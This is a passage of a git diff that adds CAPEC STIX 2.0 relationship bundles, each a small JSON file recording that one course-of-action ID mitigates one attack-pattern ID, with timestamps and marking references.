"modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb", + "target_ref": "attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac.json b/capec/relationship/relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac.json new file mode 100644 index 0000000000..44fcb7933a --- /dev/null +++ b/capec/relationship/relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9722a317-7c3a-4a4c-a090-ae83346fe8f2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e.json b/capec/relationship/relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e.json new file mode 100644 index 0000000000..45faf77b75 --- /dev/null +++ b/capec/relationship/relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4f22e883-858c-491e-bf7a-f68076aa3688", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b", + "target_ref": "attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1.json b/capec/relationship/relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1.json new file mode 100644 index 0000000000..ec537dabc1 --- /dev/null +++ b/capec/relationship/relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1d6f5c02-1e39-4e45-aef7-c1df9df25bf8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785", + "target_ref": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cf1c4ee3-f9f4-4ee0-9298-e76477625c86.json b/capec/relationship/relationship--cf1c4ee3-f9f4-4ee0-9298-e76477625c86.json new file mode 100644 index 0000000000..21117ff9d0 --- /dev/null +++ b/capec/relationship/relationship--cf1c4ee3-f9f4-4ee0-9298-e76477625c86.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7384ba83-0353-4d64-857f-ef40f4949151", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cf1c4ee3-f9f4-4ee0-9298-e76477625c86", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649", + "target_ref": "attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6.json b/capec/relationship/relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6.json new file mode 100644 index 0000000000..fb7255355b --- /dev/null +++ b/capec/relationship/relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ba37f124-7623-4db6-a8a2-1e15615fe5a5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f", + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cf721c34-2455-49c9-87ab-611748f9729e.json b/capec/relationship/relationship--cf721c34-2455-49c9-87ab-611748f9729e.json new file mode 100644 index 0000000000..0d2026c61a --- /dev/null +++ b/capec/relationship/relationship--cf721c34-2455-49c9-87ab-611748f9729e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--56475f0a-61a2-46f6-9d4a-f69a84030fc9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cf721c34-2455-49c9-87ab-611748f9729e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34", + "target_ref": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6.json b/capec/relationship/relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6.json new file mode 100644 index 0000000000..9ee6eb39e9 --- /dev/null +++ b/capec/relationship/relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--17ff29ef-60b5-4211-b666-527384085eec", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7.json b/capec/relationship/relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7.json new file mode 100644 index 0000000000..dd96a627bc --- /dev/null +++ b/capec/relationship/relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cff8a1c1-0504-4806-932a-6ec1acd5a9af", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9.json b/capec/relationship/relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9.json new file mode 100644 index 0000000000..52f66e9ba0 --- /dev/null +++ b/capec/relationship/relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--00aec3e4-ea92-45e3-a7ec-24be0afa62d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d077bf67-717c-431d-8807-92f3e2097865.json b/capec/relationship/relationship--d077bf67-717c-431d-8807-92f3e2097865.json new file mode 100644 index 0000000000..7ef146fb2a --- /dev/null +++ b/capec/relationship/relationship--d077bf67-717c-431d-8807-92f3e2097865.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4bfe0518-dfa2-4091-89c4-02747e5f2aa3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d077bf67-717c-431d-8807-92f3e2097865", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d32c1276-0d53-4aed-93c1-390329302d45", + "target_ref": "attack-pattern--f2009992-b316-48ff-8d26-862971791ad3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d0bc5860-9b04-48da-a5f7-565401e455d0.json b/capec/relationship/relationship--d0bc5860-9b04-48da-a5f7-565401e455d0.json new file mode 100644 index 0000000000..f0eab81715 --- /dev/null +++ b/capec/relationship/relationship--d0bc5860-9b04-48da-a5f7-565401e455d0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3a07cd23-5f38-4bc8-a2eb-599e7f9db4ec", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d0bc5860-9b04-48da-a5f7-565401e455d0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac", + "target_ref": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d19620bf-46ac-4d64-ade7-b75e7eb319ee.json b/capec/relationship/relationship--d19620bf-46ac-4d64-ade7-b75e7eb319ee.json new file mode 100644 index 0000000000..3a7565a03c --- /dev/null +++ b/capec/relationship/relationship--d19620bf-46ac-4d64-ade7-b75e7eb319ee.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cbafb940-f12f-4ddd-83fe-f937829f3513", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d19620bf-46ac-4d64-ade7-b75e7eb319ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5.json b/capec/relationship/relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5.json new file mode 100644 index 0000000000..0906689b9e --- /dev/null +++ b/capec/relationship/relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fffe90cc-43d1-435b-9365-8abbde644d31", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0", + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d20b7e36-5317-45bc-9e89-762bbfa2dd1e.json b/capec/relationship/relationship--d20b7e36-5317-45bc-9e89-762bbfa2dd1e.json new file mode 100644 index 0000000000..896d7eefab --- /dev/null +++ b/capec/relationship/relationship--d20b7e36-5317-45bc-9e89-762bbfa2dd1e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fbdd61b6-a0f9-467b-a15d-e9b4e4bf2999", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d20b7e36-5317-45bc-9e89-762bbfa2dd1e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266", + "target_ref": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d2218e8a-5035-416c-9762-451d807827d9.json b/capec/relationship/relationship--d2218e8a-5035-416c-9762-451d807827d9.json new file mode 100644 index 0000000000..5383db4875 --- /dev/null +++ b/capec/relationship/relationship--d2218e8a-5035-416c-9762-451d807827d9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--88193224-d3f1-4b4f-abf3-b9559b3888ae", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d2218e8a-5035-416c-9762-451d807827d9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44", + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d29c49cc-16e8-4c17-a5c2-5e4415d7b815.json b/capec/relationship/relationship--d29c49cc-16e8-4c17-a5c2-5e4415d7b815.json new file mode 100644 index 0000000000..8e9bc718c2 --- /dev/null +++ b/capec/relationship/relationship--d29c49cc-16e8-4c17-a5c2-5e4415d7b815.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6afc86f6-7de5-48a8-85d8-f6524cc890fb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d29c49cc-16e8-4c17-a5c2-5e4415d7b815", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--12149275-8476-4bee-923b-b2677b531ca2", + "target_ref": "attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf.json b/capec/relationship/relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf.json new file mode 100644 index 0000000000..b580c56d23 --- /dev/null +++ b/capec/relationship/relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c539738f-14c0-434c-b26f-a7454f154088", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d33fd327-13cb-4adc-b807-9ff679445dad.json b/capec/relationship/relationship--d33fd327-13cb-4adc-b807-9ff679445dad.json new file mode 100644 index 0000000000..43b528c497 --- /dev/null +++ b/capec/relationship/relationship--d33fd327-13cb-4adc-b807-9ff679445dad.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6a74b413-e78d-4ab8-9a85-bc2d3a275ae3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d33fd327-13cb-4adc-b807-9ff679445dad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d34e4a9a-884e-4ede-8bb0-ecb72878cd9e.json b/capec/relationship/relationship--d34e4a9a-884e-4ede-8bb0-ecb72878cd9e.json new file mode 100644 index 0000000000..06c6f51b2a --- /dev/null +++ b/capec/relationship/relationship--d34e4a9a-884e-4ede-8bb0-ecb72878cd9e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--263a229b-4555-4aaf-9f5f-190c9d78d2ef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d34e4a9a-884e-4ede-8bb0-ecb72878cd9e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856", + "target_ref": "attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc.json b/capec/relationship/relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc.json new file mode 100644 index 0000000000..2972ec1bf1 --- /dev/null +++ b/capec/relationship/relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7a611cd0-9edf-4a86-ab3c-b33d3d984b4b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d42da37c-5f9f-4437-ba40-8053ede73471.json b/capec/relationship/relationship--d42da37c-5f9f-4437-ba40-8053ede73471.json new file mode 100644 index 0000000000..b17c921945 --- /dev/null +++ b/capec/relationship/relationship--d42da37c-5f9f-4437-ba40-8053ede73471.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1d42c5b3-429c-4ae3-be47-9b6f2b65d724", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d42da37c-5f9f-4437-ba40-8053ede73471", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757", + "target_ref": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5.json b/capec/relationship/relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5.json new file mode 100644 index 0000000000..88a298bfd1 --- /dev/null +++ b/capec/relationship/relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--763a0461-db3f-47b1-9e5d-81c8659972f4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238", + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4.json b/capec/relationship/relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4.json new file mode 100644 index 0000000000..5660b46f3d --- /dev/null +++ b/capec/relationship/relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--181ee48c-4415-40c0-a8c0-26980b872d09", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117", + "target_ref": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d5acf000-e927-4934-baeb-fc883db06de3.json b/capec/relationship/relationship--d5acf000-e927-4934-baeb-fc883db06de3.json new file mode 100644 index 0000000000..1431458e70 --- /dev/null +++ b/capec/relationship/relationship--d5acf000-e927-4934-baeb-fc883db06de3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--84c807fd-33c7-4688-8c8d-e025f7400f2c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d5acf000-e927-4934-baeb-fc883db06de3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47", + "target_ref": "attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d.json b/capec/relationship/relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d.json new file mode 100644 index 0000000000..5b8f86c339 --- /dev/null +++ b/capec/relationship/relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b4ce28bf-4695-40cd-a2a2-acbace29b34e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d", + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d61b1986-cb61-404b-950f-99e02127487b.json b/capec/relationship/relationship--d61b1986-cb61-404b-950f-99e02127487b.json new file mode 100644 index 0000000000..dad3b90078 --- /dev/null +++ b/capec/relationship/relationship--d61b1986-cb61-404b-950f-99e02127487b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b15b8525-b9b0-43fe-8377-e2111a36389a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d61b1986-cb61-404b-950f-99e02127487b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4.json b/capec/relationship/relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4.json new file mode 100644 index 0000000000..4a77536e18 --- /dev/null +++ b/capec/relationship/relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--861d0783-b039-4788-a05b-abea6369071e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8", + "target_ref": "attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58.json b/capec/relationship/relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58.json new file mode 100644 index 0000000000..360bebbec7 --- /dev/null +++ b/capec/relationship/relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--16b7ea77-3e6a-4c5d-87f2-80633e756f35", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": 